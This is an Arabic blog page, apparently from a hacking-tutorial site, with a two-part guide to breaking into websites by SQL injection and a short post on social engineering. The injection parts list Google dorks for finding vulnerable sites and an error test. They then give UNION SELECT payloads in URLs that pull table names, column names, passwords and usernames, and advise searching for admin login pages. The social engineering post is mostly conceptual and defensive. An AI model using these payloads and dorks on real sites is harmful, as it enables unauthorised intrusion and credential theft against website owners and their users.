SQL INJECTION الجزء الثاني

SQL INJECTION 

الجزء الثاني 

السلام عليكم ورحمة الله وبركاته في التدوينة السابقة قمت بشرح حول هذه الثغرة كما سجلت مقطع فيديو كي أوضح لك الشرح. والان وبعون لله تعالى تم شرح الجزء الثاني وهو مقسم الى قسمين قسم مصور و قسم التدوينة 

القسم المموجود في التدوينة ما هو ألا شرح مبسط إضافة الى الأوامر المستخدمة في الشرح.  نبدأ على بركة لله تعالى

قد تعلمنا في التدوينة السابقة كيفية أستخراج اسم القاعدة والان ما علينا سوى الذهاب وتشفير اسم القاعدة لأستخدامها

في الأوامر المراد اتخاذها في سبيل اختراق الموقع

لنفرض ان اسم القاعدة هو 

Database Name: MacBook3arabi

ما عليك سوى نسخ اسم القاعدة والذهاب الى مواقع التشفير (رابط المواقع موجود أسفل المدونة)  وبهذا تتم عملية التشفير

والأن ننتقل الى الأمر لأستخراج اسم الجدول من اسم القاعدة 

لنفرض ان رابط الموقع المستهدف هو 

www.victimsite.com/index.php?macbook3arabiId=30

وكان عدد الأعمدة عشرة والأعمدة المصابة هي أثنان و ثلاثة و خمسة 

والأن ما علي سوى حذف إحدة الاعمدة الماصبة ولتكن اثنان وكتابة

concat(table_name)

وفي نهاية الرابط نكتب 

from information_schema.tables where table_schema=0x6772776f726b5f6772776f726b666f726365

0x6772776f726b5f6772776f726b666f726365 اسم القاعدة المشفر 

فيصبح الرابط كالتالي

www.victimsite.com/index.php?macbook3arabiId=-30 union select 1,concat(table_name),3,4,5from information_schema.tables where tables_schema= 0x6772776f726b5f6772776f726b666f726365--

ولنفرض ان اسم الجدول الموجود هو 

Omar 

والان نحتاج الى استخراج اسماء الاعمدة من اسم الجدول 

Omar

اولا يجب علينا تشفير اسم الجدول باستخدام نفس الموقع (رابط الموقع موجود اسفل التدوينة)  ثم

نضع بدل العمود المصاب الأمر التالي

group_concat(column_name)

وفي نهاية الرابط

from information_schema.columns where table_name=0x63617465676f7279
--
0x63617465676f7279 اسم الجدول المشفر

فيصبح الرابط 

http://victimesite.com/index.php?macbook3arabiId=-30 union select 1,group_concat(column_name)2,3,4,5

from information_schema.columns where table_name=0x63617465676f7279

--

 والان يظهر لدينا اسماء الاعمدة الموجودة في الجدول 

والان نختار اسم العمود المراد استخراج المعلومات منه ولنفرض اسم العمود هو 

Password 

وكتابة بعد الأمر بدل من اسم العمود المصاب

concat(password)

وفي نهاية الرابط

from omar--

منغير تشفير

victimsite.com/index.php?maccbok3arabiId=-30 union select 1,concat(password),3,4,5from omar--

والان تظهر لك الباسورد ثم تأخذ عمود اخر ولنفرض 

User 

وتسبدله بمكان الباسورد فيظهر لك اسم اليوزر 

وبهذا تتوصل الى المعلومات بالنسبة للوصول الى لوحة التحكم فما عليك سوى البحث في محركات البحث مع استخدام جمل

victimsite.com/login.php

وغيرها حتى تصل الى لوحة التحكم وتدخل بينانات ثم تتم الاختراق بإذن لله تعالى 

رابط الموقع التشفير

أضغط هنا

مشاهدة الجزء الأول مصور 

مشاهدة الجزء الثاني مصور

https://www.youtube.com/watch?v=q6EWRUsy0RU

SQL INJECTION

SQL INJECTION 

How to Hack a website using SQL INJECTION method?

هذه التدوينة هي الجزء الأول من الدرس الكامل الذي يتكلم حول ثغرة السكل انجيكشن. ستتكلم الدوينة على جميع ما ذكر في الفيديو ولكن بشئ مختصر 

الـ دورك الثغرة : هناك العديد من الدوارك ولكن سأعطيك ثلاث دوارك شغالة بإذن لله ما عليك سوى وضعها في محركات البحث 

الدوارك هي

• inurl:index.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=
• inurl:pageid=

 انسخ الدورك وضعه في محرك البحث لتحصل على المواقع المصابة بهذه الثغرة 

فحص الثغرة: كيف تتعرف على ان المواقع مصاب بالثغرة ام لاء؟ 

الفحص بسيط ما عليك سو إضافة إشارة بسيطة واذا واجهت خطأ فإذن الموقع مصاب بالثغرة 

' 

"

انا استخدم الإشارة الأولى ولكن بعض الاحيان استخدم الثاني للتأكد من وجود الثغرة 

الخطأ غالبا يظهر كهذا  

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

قد تختلف من موقع الى اخر ولكن المعنى واحد 

الوصول الى عدد الأعمدة: للوصول الى الأعمدة اتبع الأمر التالي 

www.victimsite.com/index.php/id?=2 ORDER BY N

طبعا الجزء المكبر هو الأمر ام الباقي فهو الرابط المواقع المصاب بالغرة 

للوصول الى العدد بسرعة شاهد الفيديو الموجود اسفل التدوينة 

عدد الأعمدة المصاب:معرفة عدد الأعمدة المصابة 

لنفرض كان عدد الاعمدة الموجودة في الموقع المصاب بالثغرة هو ١٣ 

ما عليك سوى كتابة 

www.victimsite.com/index.php/id?=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--

وستظهر لك عدد الأعمدة المصابة 

انتهى الشرح لمشاهدة الفيديو اضغط على المربع الموجود اسفل التدوينة 

https://www.youtube.com/watch?v=oX3261r1bBQ&feature=youtu.be

Social Engineering

الهندسة الإجتماعية Social Engineering 

كي نتعلم كيفية استخدام الهندسة الإجتماعية يجب علينا تعلم مفهوم الهندسة الإجتماعية هذه التدونية ملحقة بالفيديو الذي يدور حول الهندسة الإجتماعية وكيفية الأختراق  بأساليب مختلفة.
الهندسة الإجتماعية: هي دراسة النفسية للضحية بحيث تمكن المخترق من جمع اكبر عدد من المعلومات حول الضحية مما تساعده في اختراقه والوصول الى بياناته. 

أساليب الهندسة الإجتماعية متركزة على ثلاث مراحل
الأولى جمع معلومات عن الضحية
الثانية تحليل المعلومات ودراستها
والاخيرة إيجاد الثغرات الموجودة في الضحية 

قد تختلف اسلوب الهندسة الإجتماعية من شخص الى اخر وهذا يعود الى طبيعة الضحية وخبراته حول هذه المادة 

أساليب شائعة
بعض الاساليب الشائعة في عصرنا الحالي هي
برامج وهمية كمثال اختراق الفيس بوك والخ... او الأجهزة 

FaceBook Account Hacker is FAKE 100%

رسائل تنص بجوائز عالية القيمة مئة دولار او ما شابه
مواقع وهمية بهدف الدخول إليها والتحميل منها

هذه اكثر الأساليب الشائعة في عصرنا الحالي او في العالم العربي

الحماية من الاختراق النفسي وتطوير مهاراتك في الهندسة الإجتماعية

لتطوير نفسك عليك بقرأءة بعض القصص حول المخترقين و قراءة بعض المقالات التي تناقش الهندسة الإجتماعية ولكن ملاحظة لا تعتمد على مصدر واحد أقرأ من اكثر من مصدر وناقش المعلومات وحللها
لا تثق بأحد على الانترنت دون السؤال عنه و عمل بحث حوله
حاول ان تتمع بالغموض لا تنشر كل معلوماتك على الانترنت

 وهنا يكون قد انتهى المقال

للتواصل
Macbook3arabi@hotmail.com